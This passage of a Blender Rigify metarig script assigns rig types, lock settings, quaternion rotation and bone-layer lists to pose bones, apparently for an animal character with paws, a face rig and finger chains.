pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_pinky.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_ring.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_middle.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_index.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['face']]
pbone.rigify_type = 'faces.super_face'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.secondary_layers = [False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['front_foot.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['front_foot.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_pinky.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_ring.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_middle.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_index.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_pinky.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_ring.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_middle.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_index.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.T.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.B.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.T.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.B.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['eye.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['eye.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.T.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.T.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['teeth.T']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['teeth.B']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['tongue']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['front_toe.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['front_toe.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.rotation_axis = "x"
except AttributeError:
pass
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_pinky.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_ring.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_middle.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_index.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_pinky.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_ring.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_middle.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_index.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.T.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.B.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chin']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.T.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lip.B.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.T.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.T.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['tongue.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.04.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.01.L']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.04.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
